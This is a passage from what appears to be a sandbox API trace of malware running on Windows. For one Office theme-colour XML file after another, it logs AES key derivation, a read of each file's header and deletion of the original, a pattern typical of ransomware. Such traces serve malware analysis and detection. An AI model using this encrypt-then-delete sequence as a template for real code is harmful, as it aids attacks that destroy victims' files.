office\\document themes 14\\theme colors\\adjacency.xml")) returned 1 [0158.642] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.643] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.643] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.643] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.643] GetFileSize (in: hFile=0x4a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39d [0158.643] ReadFile (in: hFile=0x4a4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.673] CryptDestroyHash (hHash=0x284d668) returned 1 [0158.673] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.673] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.674] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Angles.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\angles.xml")) returned 1 [0158.676] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.677] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.677] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.677] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.677] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3bf [0158.677] ReadFile (in: hFile=0x498, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.691] CryptDestroyHash (hHash=0x284d568) returned 1 [0158.691] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.691] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.692] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apex.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apex.xml")) returned 1 [0158.837] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.838] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.838] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.838] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.838] GetFileSize (in: hFile=0x4a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c5 [0158.838] ReadFile (in: hFile=0x4a4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.841] CryptDestroyHash (hHash=0x284d668) returned 1 [0158.841] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.841] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.842] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Apothecary.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\apothecary.xml")) returned 1 [0158.843] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.843] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.843] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.843] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.843] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c1 [0158.844] ReadFile (in: hFile=0x498, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.845] CryptDestroyHash (hHash=0x284d568) returned 1 [0158.845] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.845] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.847] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Aspect.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\aspect.xml")) returned 1 [0158.851] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.855] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.855] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.855] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.855] GetFileSize (in: hFile=0x4a4, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c1 [0158.855] ReadFile (in: hFile=0x4a4, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.906] CryptDestroyHash (hHash=0x284d668) returned 1 [0158.906] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.906] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.907] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Austin.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\austin.xml")) returned 1 [0158.908] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.909] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.909] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.909] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.909] GetFileSize (in: hFile=0x498, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39f [0158.909] ReadFile (in: hFile=0x498, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.911] CryptDestroyHash (hHash=0x284d568) returned 1 [0158.911] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.911] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.915] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Black Tie.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\black tie.xml")) returned 1 [0158.916] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.917] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.917] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.917] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.917] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c0 [0158.917] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.924] CryptDestroyHash (hHash=0x284d668) returned 1 [0158.924] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.924] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.925] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Civic.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\civic.xml")) returned 1 [0158.926] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.928] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.928] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.928] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.928] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x39e [0158.928] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.930] CryptDestroyHash (hHash=0x284d568) returned 1 [0158.930] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.930] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.931] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Clarity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\clarity.xml")) returned 1 [0158.941] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.941] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.941] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.942] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.942] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c4 [0158.942] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.945] CryptDestroyHash (hHash=0x284d668) returned 1 [0158.945] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.945] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.946] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Composite.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\composite.xml")) returned 1 [0158.947] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.948] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.948] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.948] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.948] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c4 [0158.948] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.957] CryptDestroyHash (hHash=0x284d568) returned 1 [0158.957] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.957] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0158.958] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Concourse.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\concourse.xml")) returned 1 [0158.959] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0158.960] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0158.960] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0158.960] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0158.960] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c2 [0158.960] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0158.999] CryptDestroyHash (hHash=0x284d668) returned 1 [0158.999] CryptDestroyKey (hKey=0x284d528) returned 1 [0158.999] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.000] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Couture.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\couture.xml")) returned 1 [0159.001] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.002] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.002] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.002] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.002] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c4 [0159.002] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.004] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.004] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.004] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.005] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Elemental.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\elemental.xml")) returned 1 [0159.006] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.008] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.009] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.009] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.009] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c1 [0159.009] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.028] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.028] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.028] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.029] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Equity.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\equity.xml")) returned 1 [0159.035] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.035] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.035] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.035] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.035] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a0 [0159.035] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.051] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.051] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.051] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.052] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Essential.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\essential.xml")) returned 1 [0159.056] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.056] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.056] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.056] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.056] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c4 [0159.056] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.128] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.128] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.128] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.130] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Executive.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\executive.xml")) returned 1 [0159.131] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.131] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.131] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.131] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.131] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3bf [0159.132] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.134] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.134] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.134] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.135] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Flow.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\flow.xml")) returned 1 [0159.136] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.137] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.137] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.137] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.137] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3c2 [0159.137] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.192] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.192] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.192] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.194] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Foundry.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\foundry.xml")) returned 1 [0159.225] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.225] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.225] CryptHashData (hHash=0x284d568, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.225] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d568, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.225] GetFileSize (in: hFile=0x4ac, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3a0 [0159.225] ReadFile (in: hFile=0x4ac, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.227] CryptDestroyHash (hHash=0x284d568) returned 1 [0159.227] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.227] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.229] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grayscale.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grayscale.xml")) returned 1 [0159.230] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.230] CryptCreateHash (in: hProv=0xa52810, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326b260 | out: phHash=0x326b260) returned 1 [0159.230] CryptHashData (hHash=0x284d668, pbData=0xa9e670, dwDataLen=0x100, dwFlags=0x0) returned 1 [0159.230] CryptDeriveKey (in: hProv=0xa52810, Algid=0x6610, hBaseData=0x284d668, dwFlags=0x0, phKey=0x326b254 | out: phKey=0x326b254*=0x284d528) returned 1 [0159.230] GetFileSize (in: hFile=0x4a8, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3bf [0159.230] ReadFile (in: hFile=0x4a8, lpBuffer=0x326b2d4, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326b264, lpOverlapped=0x0 | out: lpBuffer=0x326b2d4*, lpNumberOfBytesRead=0x326b264*=0x80, lpOverlapped=0x0) returned 1 [0159.232] CryptDestroyHash (hHash=0x284d668) returned 1 [0159.232] CryptDestroyKey (hKey=0x284d528) returned 1 [0159.232] CryptReleaseContext (hProv=0xa52810, dwFlags=0x0) returned 1 [0159.233] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Colors\\Grid.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme colors\\grid.xml")) returned 1 [0159.234] CryptAcquireContextW (in: phProv=0x326b25c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326b25c*=0xa52810) returned 1 [0159.235] 